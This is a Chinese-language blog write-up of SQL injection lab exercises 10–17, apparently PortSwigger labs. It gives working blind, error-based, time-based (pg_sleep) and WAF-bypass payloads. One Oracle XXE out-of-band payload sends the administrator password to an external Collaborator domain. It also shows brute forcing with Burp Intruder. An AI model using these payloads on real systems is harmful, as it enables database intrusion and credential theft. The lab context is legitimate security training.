17连环靶场SQL注入—漏洞就在延迟的那1s中(下)

最新推荐文章于 2024-07-03 11:52:25 发布
最新推荐文章于 2024-07-03 11:52:25 发布
阅读量209 收藏 1
点赞数
文章标签: sql 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fffhhdd/article/details/130613165
版权

17连环靶场SQL注入—漏洞就在延迟的那1s中

原来漏洞就在延迟的那1s中

十号靶场

和上面没太大区别,数据库换为oracle了

image-20230509232242771

拿字段

image-20230509232404903

爆出账户:

image-20230509232525729

十一号靶场

image-20230509232730501

构造判断payload后,发现没有报错,但是却没有回显

BurpSuite一顿测试后,发现cookie如果测试注入点1=1正确的情况下,会出先welcome 字样,但是如果注入失败,没有该字样,cookie参数致命注入点!

image-20230509234135383

祭出bool盲注(通过 bool 即 true和false结合二分搜索算法,定位数据库+表+字段 及名称的一种注入方式)

虽然麻烦(尝试使用sqlmap偷懒,却没有成功~~~0,0)

构造payload

hnkOCAAYwmvqMG6O’+and+1%3d1–

image-20230509234027628

image-20230509234240431

既然发现注入点,剩下工作就是拿表拿数据了

因为bool盲注测试很麻烦, 所以最好结合一下二分搜索法的算法

构造payload 猜测表名是否为users

**hnkOCAAYwmvqMG6O’ and (select ‘x’ from users limit 1)=‘x’-- **

image-20230509234806980

构造payload猜测用户名是否为 administrator

hnkOCAAYwmvqMG6O’ and (select username from users limit 1)=‘administrator’–

image-20230509234911799

构造payload判断出密码长度为20

hnkOCAAYwmvqMG6O’ and (select username from users where username=‘administrator’ and length(password)>1)=‘administrator’–

image-20230509235030543

下来就是通过ascii来一个一个猜测字母,这个过程很麻烦,所以是时候祭出爆破组了,BurpSuite里面有很好用的爆破工具,

image-20230509235238756

Cluster Bomb,集束炸弹 名字超爱!

image-20230509235503237

利用substr函数的开始下标参数,和 判断结果字母 作为爆破点,配置好爆破方式,开启爆破!

爆破点1为数字1-20,因为已经锁定密码长度为20

image-20230509235705528

image-20230509235745177

image-20230509235935445

密码爆出! 排列一下即可获得管理员密码为:nt7tk2mqnvy9r37asr0p

image-20230510000150929

十二号靶场

同样没有回显,和上一个靶场相比,也没有了welcome的提示

但测试后,发现TrackingId字段,如果加 ‘ 则响应为500 ,但是如果加两个 ’ ‘ 则响应为200

image-20230510232628215

image-20230510232723590

以此作为注入点,尝试盲注

image-20230510232831109

image-20230510232926058

构造payload

确定注入点
’ || (SELECT ‘’ FROM dual) || ’ ======> 200
’ || (SELECT ‘’ FROM aaaa) || ’ ======> 500

确定users表名
’ || (SELECT ‘’ FROM users where rownum=1) || ’ ======> 200

下来就是确定用户名,构造payload,此处payload确实学到不少东西:

' || (SELECT CASE WHEN(1=1) THEN TO_CHAR(1/0) ELSE '' END FROM dual) || '      

oracle 中 CASE 表达式类似于if-elsewhen1=1时,执行TO_CHAR函数,即将结果值从数字类型转换为String字符串,自然1/0会爆出异常
如果when1=0,结果不成立,则执行ELSE,搜索空值即可,

确定administrator用户,则转换为:
' || (SELECT CASE WHEN(1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE USERNAME='administrator') || ' 

sql的执行,会先执行外面的where 条件,当条件满足时,才会执行里面的case表达式,利用这个,则

如果administrator用户存在的话,则执行1=1 ,进而执行1/0,爆出异常

如果administrator不存在的话,则不会执行case表达式,则不会爆出异常

再通过同样的方式,确定password

确定PASSWORD的长度
’ || (SELECT CASE WHEN(1=1) THEN TO_CHAR(1/0) ELSE ‘’ END FROM users WHERE USERNAME=‘administrator’ AND LENGTH(password)>1) || ’
得到结果20

构造payload
’ || (SELECT CASE WHEN(1=1) THEN TO_CHAR(1/0) ELSE ‘’ END FROM users WHERE USERNAME=‘administrator’ AND SUBSTR(password,1,1)=‘a’) || ’

再利用 集束炸弹 进行爆破!

确认爆破点

image-20230510233817250

image-20230510233938469

确定密码:crc2eo0kkdauvxmy2mdo

image-20230510234103696

解决!

十三号靶场

同样没有回显,TrackingId 测试没发现注入点,延时注入,生效

构造payload

image-20230510235420712

十四号靶场

同样延时注入,只是这次要求用administrator身份登录

1、确定注入点 payload
’ || pg_sleep(10)–

2、确定users表存在
’ || (SELECT CASE WHEN(1=0) THEN pg_sleep(10) else pg_sleep(-1) end)–
’ || (SELECT CASE WHEN(username=‘administrator’) THEN pg_sleep(10) else pg_sleep(-1) end from users)–

3、确定password 的长度 为20
’ || (SELECT CASE WHEN(username=‘administrator’ AND LENGTH(password)>1) THEN pg_sleep(10) else pg_sleep(-1) end from users)–

4、确定password
’ || (SELECT CASE WHEN(username=‘administrator’ AND SUBSTR(password,1,1)=‘a’) THEN pg_sleep(10) else pg_sleep(-1) end from users)–

同理,爆破组准备!因为这次是延时注入,所以还需设置线程数为1,因为BurpSuite默认为10个线程同时跑,这样延时效果就会失效,爆破不出东西(学到就是赚到)

image-20230511000622103

response响应时间有明显的10s以上的延迟,就是正确密码,排列后得到密码:

s1azjop4kgfcd9tn04l5

image-20230511000856948

十五号靶场

image-20230511001249218

image-20230511002724088

BurpCollaborator ,带外工具

什么是Burp Collaborator?

Burp Collaborator 是 OAST的产物,它可以帮你实现对响应不可见和异步的一个漏洞检测。

测试跨站可能有些功能插入恶意脚本后无法立即触发或者是盲注跨站这种。解决办法是,我们需要一个外部的独立的服务器,可以通过域名 url 进行访问。而Burp 给我们提供了这个外部服务器,叫 Collaborator

image-20230511005253040

先搞定一波payload的写法,以Oracle为例

SELECT EXTRACTVALUE(xmltype(‘<?xml version="1.0" encoding="UTF-8"?> %remote;]>’),‘/l’) FROM dual

将Collaborator 获得的外部服务器地址:y326l2jf89l2g28y81cbm8irvi19py.oastify.com

将这个URL地址替换DNS look up 中的http位置,得到最终payload:

’ UNION SELECT EXTRACTVALUE(xmltype(‘<?xml version="1.0" encoding="UTF-8"?> %remote;]>’),‘/l’) FROM dual–

image-20230511010155085

抓包攻击!

后,回到Collaborator ,poll now ,下面就会获取到DNS的信息,破局!

image-20230511010304999

十六号靶场

依旧需要 带外攻击,与上面靶场类似,只是这次需要渗透到密码,登录才可以通关

image-20230511010824598

构造payload

SELECT EXTRACTVALUE(xmltype('<?xml version="1.0"  encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM  "http://'||(SELECT YOUR-QUERY-HERE)||'.BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),'/l') FROM dual

获取Collaborator :qrlhbd33kdi9aou358r3kjhrgim9ay.oastify.com

构造最终payload:

' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0"  encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM  "http://'||(SELECT password from users where username='administrator')||'.qrlhbd33kdi9aou358r3kjhrgim9ay.oastify.com

/"> %remote;]>'),'/l') FROM dual--

image-20230511011259501

得到密码:

der761b0wuz9hndbbgsw

搞定!

十七号靶场

最后一个了~~加油了!

image-20230511011447019

题目最终还是要渗透到管理员账户,UNION攻击从其他表中获取数据

image-20230511013530215

进入靶场,内部下拉框处抓包发现了xml文件,前面提示也看到了xml,想必注入点就在这里,尝试UNION攻击

image-20230511013751372

提示出 ”检测到攻击“,所以说防火墙发现了攻击语句,结合题目,那就是要编码绕过防火墙即可。

重新构造payload,并且通过Hackvertor 来进行编码尝试绕过:

image-20230511014039070

发现dev_entrites 编码成功绕过WAF,这就OK啦~~

构造最终payload:

<@dec_entities>1 UNION SELECT concat(username,password) from users<@/dec_entities>

得到密码:qzr5kp1l5iyy617wh23z

image-20230511014248887

image-20230511014324826

找寻新世界还为时不晚,因为我的梦想是杨帆到日落之后的地方…

PuPPET ER
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
连环注入与监视新进程注入源码
11-16
连环注入(Chain Injection)是一种高级的代码注入技术,它涉及在多个层次或阶段执行注入攻击,以绕过安全防御并实现更深的系统控制。这种技术通常被黑客用于渗透测试和恶意软件活动,以获得对目标系统的持久访问...
一次奇特的应急响应
qq_50765147的博客
03-05 2680
ps:在hosts文件手动添加了一个域名与其对应的IP地址映射后,操作系统在处理对该域名的请求时,会优先查询hosts文件而不是向DNS服务器发起请求。
Apache Log4j2漏洞复现
weixin_51151498的博客
01-23 1443
Apache Log4j2漏洞
三流安全工程师的渗透测试记录
最新发布
jennycisp的博客
07-03 1445
熟悉笔者的朋友都知道,我目前在测评机构做专职渗透测试,平常的工作也只是侧重于验证漏洞存在即可,并不太涉及对漏洞的深入利用以及实际能产生的危害。但作为渗透爱好者,怎么可能仅仅满足于此。在时间、条件允许的情况下,我会在测评对象的范围内尽可能地找出高危,追求getshell,把客户系统当作靶场来搞(狗头)。本文记录了最近一段时间在工作遇到的一些漏洞(相关漏洞目前均已修复,相关截图均已进行脱敏处理),没啥技术含量,纯脚本小子有手就行,大佬勿喷。
【burpsuite安全练兵场-客户端16】测试WebSockets安全漏洞-3个实验(全)
热门推荐
01-17 1万+
【BP靶场portswigger-客户端16测试WebSockets安全漏洞】3个实验-万文详细步骤
三流安全工程师的渗透测试记录_ u0040 u0074 u0079 u0070 u0065
2401_83621136的博客
04-12 1255
返回为成功,使用abc#123456确实登录成功。然而这并不意味着,无论何时,直接发送重置密码的数据包都能成功的,这里能成功,是因为手机验证码一般都会有个有效时间,大概发送验证码后的十分钟内,直接发送重置密码的包是能重置成功的。十分钟后虽然返回也是成功,但是登录不上。给的修复建议是:1.后端校验验证码是否正确;2.去掉单独校验验证码的数据包,将验证码与修改后的密码在同一数据包发送给后端,后端校验验证码正确后直接修改密码,不二次发包。
关于我如何赚取漏洞赏金的那些事
MachineGunJoe666
06-12 235
我尝试使用不同的有效载荷,并意外地发现,如果我在adduser参数指定两个由空格(test%20somename)分隔的值,例如在这个URL:http://example.com/ftp-upload/sync.php?结果发现,在代码,他们使用了对本地bash脚本的调用,通过shell_exec()函数保存和删除ftp用户,该函数采用了未经过滤的用户输入,这导致了RCE漏洞的出现。名称带有有效载荷的目录已经创建,现在需要运行带有易受攻击的函数的脚本,读取该目录的内容。
MySQL面试知识点追命连环问(二)事务、索引及SQL优化
12-14
MySQL是世界上最流行的关系型数据库管理系统之一,其在面试经常涉及的话题包括事务处理、索引以及SQL优化。本文将深入探讨这些关键知识点。 1. **MySQL事务** - **事务** 是数据库操作的基本单位,确保数据的...
自动化识别技术在幼儿园安全防范管理系统的应用构想
01-19
根据近全国范围内出现连环幼儿园杀人案件的分析,针对幼儿园的特殊环境我们公司提出了自己的构想,实现幼儿园环境真正走上安全:幼儿园是一个很脆弱的环境,很需要有一套安全有效的系统去管理。门口出入人员管理极为...
连环代替法在多因素敏感性分析的应用整理.pdf
11-02
连环代替法在多因素敏感性分析的应用整理.pdf
python解下九连环
03-21
非常简单的利用python解开九连环,直接按照步骤即可解开
ctfshow学习记录-web入门(php特性127-136)
龟速更新的九某人
07-26 1464
ctfshow学习记录-web入门(php特性web127-136)
30连环靶场XSS跨站脚本攻击—进阶篇1
找寻新世界还为时不晚,因为我的梦想是杨帆到日落之后的地方,尽管现今还无法实现, 但旧日的力量曾撼动天地。
06-06 144
PortSwigger XSS 跨站脚本靶场 攻略向~
SSRF被动检测插件-ssrf-king
siu~
09-01 1273
一款好用的SSRF被动检测插件。
burpsuite靶场——XXE
qq_61768489的博客
12-26 1361
XML全称是可扩展标记语言,是用来存储和传输数据的一种数据格式,结构上和HTML类似,但是XML使用的是自定义的标签名,XML在Web早期比较流行,现在开始流行JSON格式的数据了。XML实体是一种表示数据项的方式,比如用实体< and >表示符号,XML用实体来表示XML标签。DTD全称是document type definition,其可以定义XML文档的结构、它可以包含的数据类型和其他项目。DTD在XML文档开头以可选DOCTYPE节点声明。
burpsuite靶场——SSRF
qq_61768489的博客
12-26 1469
即使有一些HTTP流量会被拦截,也会因为不怎么拦截DNS流量而获取我们想要的结果。从名字就能看出来这个插件可以对每一个点都进行collaborator测试以发现可以使用带外技术发送请求的点,为了方便插件进行测试,我们将靶场地址添加到目标。有的后端系统用户是无法直接访问的,但是服务器可以成功向其发送请求,所以如果利用ssrf同样可以向这些本不对用户开放的后端系统发出恶意请求。有的情况还可以利用SSRF盲打对目标后端系统进行探测,比如探测目标网络开放的主机及端口之类的,这些同样也可以通过带外通道接收到。
三流安全工程师的渗透测试记录,网络安全系列学习进阶视频
2401_83739777的博客
04-14 1088
【代码】三流安全工程师的渗透测试记录,网络安全系列学习进阶视频。
GIS技术在连环犯罪时空预测的应用
1. GIS缓冲区分析:在ArcGIS9.2软件的支持下,对犯罪地点进行缓冲区分析。这是一种空间分析技术,通过创建围绕每个犯罪地点一定距离的区域,来识别可能与犯罪活动相关的地理特征或热点区域。这种分析有助于理解犯罪...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值